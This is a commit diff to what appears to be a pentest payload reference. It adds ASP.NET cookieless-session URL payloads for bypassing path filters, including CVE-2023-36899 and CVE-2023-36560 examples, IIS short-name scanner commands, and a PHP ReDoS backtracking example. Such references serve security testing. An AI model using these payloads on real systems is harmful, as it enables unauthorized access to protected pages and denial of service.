ASP Cookieless + ReDOS backtrack

swisskyrepo · May 29, 2024 · ded1d95 · ded1d95
1 parent 67adf75
commit ded1d95
Show file tree

Hide file tree

Showing 2 changed files with 75 additions and 7 deletions.
diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md
@@ -14,6 +14,7 @@
  * [UNC Bypass](#unc-bypass)
  * [NGINX/ALB Bypass](#nginxalb-bypass)
  * [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)
+ * [IIS Short Name](#iis-short-name)
 * [Path Traversal](#path-traversal)
  * [Interesting Linux files](#interesting-linux-files)
  * [Interesting Windows files](#interesting-windows-files)
@@ -104,18 +105,55 @@ To bypass this behaviour just add forward slashes in front of the url:
 ```http:https://nginx-server////////../../```
 
 
-### ASPNET Cookieless Bypass
+### ASP NET Cookieless Bypass
 
 When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.
 
 For example, a typical URL might be transformed from: `http:https://example.com/page.aspx` to something like: `http:https://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID. 
 
+
+| .NET Version | URI |
+| -------------- | -------------------------- |
+| V1.0, V1.1 | /(XXXXXXXX)/ |
+| V2.0+ | /(S(XXXXXXXX))/ |
+| V2.0+ | /(A(XXXXXXXX)F(YYYYYYYY))/ |
+| V2.0+ | ... |
+
+
 We can use this behavior to bypass filtered URLs.
 
-```powershell
-/admin/(S(X))/main.aspx
-/admin/Foobar/(S(X))/../(S(X))/main.aspx
-/(S(X))/admin/(S(X))/main.aspx
+* If your application is in the main folder
+ ```ps1
+ /(S(X))/
+ /(Y(Z))/
+ /(G(AAA-BBB)D(CCC=DDD)E(0-1))/
+ /(S(X))/admin/(S(X))/main.aspx
+ /(S(x))/b/(S(x))in/Navigator.dll
+ ```
+
+* If your application is in a subfolder
+ ```ps1
+ /MyApp/(S(X))/
+ /admin/(S(X))/main.aspx
+ /admin/Foobar/(S(X))/../(S(X))/main.aspx
+ ```
+
+
+| CVE | Payload |
+| -------------- | ---------------------------------------------- |
+| CVE-2023-36899 | /WebForm/(S(X))/prot/(S(X))ected/target1.aspx |
+| - | /WebForm/(S(X))/b/(S(X))in/target2.aspx |
+| CVE-2023-36560 | /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ |
+| - | /WebForm/b/(S(X))in/target2.aspx/(S(X))/ |
+
+
+### IIS Short Name
+
+* [irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)
+
+```ps1
+java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/'
+java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/'
 ```
 
 
@@ -235,4 +273,5 @@ The following log files are controllable and can be included with an evil payloa
 * [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
 * [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal)
 * [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072)
-* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - 30 nov. 2023](https://youtu.be/YlZGJ28By8U)
+* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - 30 nov. 2023](https://youtu.be/YlZGJ28By8U)
+* [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - 06/24/2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10))
diff --git a/Regular Expression/README.md b/Regular Expression/README.md
@@ -30,7 +30,36 @@ Evil Regex contains:
 These regular expressions can be exploited with `aaaaaaaaaaaaaaaaaaaaaaaa!`
 
 
+### Backtrack Limit
+
+Backtracking in regular expressions occurs when the regex engine tries to match a pattern and encounters a mismatch. The engine then backtracks to the previous matching position and tries an alternative path to find a match. This process can be repeated many times, especially with complex patterns and large input strings. 
+
+PHP PCRE configuration options
+
+| Name | Default | Note |
+|----------------------|---------|---------|
+| pcre.backtrack_limit | 1000000 | 100000 for `PHP < 5.3.7`|
+| pcre.recursion_limit | 100000 | / |
+| pcre.jit | 1  | / |
+
+
+Sometimes it is possible to force the regex to exceed more than 100 000 recursions which will cause a ReDOS and make `preg_match` returning false:
+
+```php
+$pattern = '/(a+)+$/';
+$subject = str_repeat('a', 1000) . 'b';
+
+if (preg_match($pattern, $subject)) {
+ echo "Match found";
+} else {
+ echo "No match";
+}
+```
+
+
 ## References
 
 * [Regular expression Denial of Service - ReDoS - OWASP - Adar Weidman](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
-* [OWASP Validation Regex Repository - OWASP](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository)
+* [OWASP Validation Regex Repository - OWASP](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository)
+* [PHP Manual > Function Reference > Text Processing > PCRE > Installing/Configuring > Runtime Configuration](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit)
+* [Intigriti Challenge 1223 - HACKBOOK OF A HACKER](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223)